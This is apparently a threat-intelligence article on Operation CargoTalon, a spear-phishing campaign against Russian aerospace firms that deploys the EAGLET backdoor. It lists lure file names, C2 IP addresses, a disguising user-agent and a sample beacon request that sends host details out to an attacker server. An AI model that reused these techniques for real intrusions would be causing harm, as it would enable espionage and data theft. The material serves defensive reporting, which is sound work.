In late June 2025, cybersecurity analysts identified a highly sophisticated cyber espionage campaign, dubbed Operation CargoTalon, targeting Russia’s aerospace and defense sectors. This operation employs meticulously crafted spear-phishing attacks to infiltrate systems and deploy a custom-built backdoor known as the EAGLET implant.
Targeted Entities and Attack Methodology
The primary focus of Operation CargoTalon is the Voronezh Aircraft Production Association (VASO), a significant player in Russia’s aircraft manufacturing industry. The attackers demonstrate a deep understanding of Russian industrial operations by leveraging Transport Consignment Note (TTN) documents—critical components in Russian logistics—as lures to deceive targets into executing malicious payloads.
Discovery and Initial Infection Vector
On June 27, 2025, analysts from Seqrite identified the campaign while searching for malicious spear-phishing attachments on threat intelligence platforms. The threat actor, tracked as UNG0901, employs a sophisticated multi-stage attack vector that begins with malicious email files and progresses through LNK file execution to ultimately deploy the EAGLET implant.
The initial infection vector involves a malicious email file named backup-message-10.2.2.20_9045-800282.eml, containing an attachment masquerading as a ZIP file. This attachment, titled Транспортная накладная ТТН№391-44 от_26.06.2025.zip (Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip), is actually a malicious DLL file designed to evade detection through file type masquerading.
EAGLET Implant: Technical Analysis
The EAGLET implant is a custom-built DLL backdoor capable of remote command execution and data exfiltration. Upon execution, the malware establishes persistence by creating a directory called MicrosoftApppStore under the command and control (C2) server located at 185.225.17.104.
The implant utilizes Windows networking APIs, specifically WinHttpOpen and WinHttpConnect, to establish HTTP sessions while masquerading under the user-agent string MicrosoftAppStore/2001.0. This choice of user-agent appears designed to blend with legitimate Microsoft Store traffic, potentially evading network monitoring solutions that might overlook seemingly benign application store communications.
The malware’s initial beacon follows a structured format that exfiltrates basic system information:
“`
GET /poll?id=<{randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1 Host: 185.225.17.104 ``` This communication protocol enables the EAGLET implant to support three primary functions: 1. Remote Shell Access: Allows the execution of arbitrary commands on the infected system. 2. File Download Capabilities: Facilitates the staging of additional payloads. 3. Automatic Exfiltration: Sends command results through HTTP POST requests to the /result endpoint. Infrastructure and Attribution Analysis of the implant's infrastructure reveals connections to the Head Mare threat group, suggesting possible resource sharing or operational overlap between these advanced persistent threat actors. The C2 server, 185.225.17.104, is located in Romania under the ASN 39798 of MivoCloud SRL. Further investigation uncovered passive DNS records pointing to historical infrastructure previously associated with the TA505 threat group. However, apart from the infrastructural correlations, there is no direct evidence linking Operation CargoTalon to TA505. Similar Campaigns Similar campaigns have been identified targeting Russian military sectors through recruitment-themed documents. In these instances, the threat actor used the EAGLET implant connecting to a different C2 server, 188.127.254.44, located in Russia under the ASN 56694, belonging to LLC Smart Ape organization. These campaigns occasionally drop a malicious LNK file that executes the DLL implant and extracts a decoy present inside the implant's overlay section. In some cases, implants with no embedded decoy have been observed. Conclusion Operation CargoTalon exemplifies the evolving sophistication of cyber espionage campaigns targeting critical infrastructure. By leveraging industry-specific documents and employing multi-stage infection chains, threat actors can effectively infiltrate and compromise high-value targets. Organizations within the aerospace and defense sectors must remain vigilant, implementing robust cybersecurity measures to detect and mitigate such advanced threats.
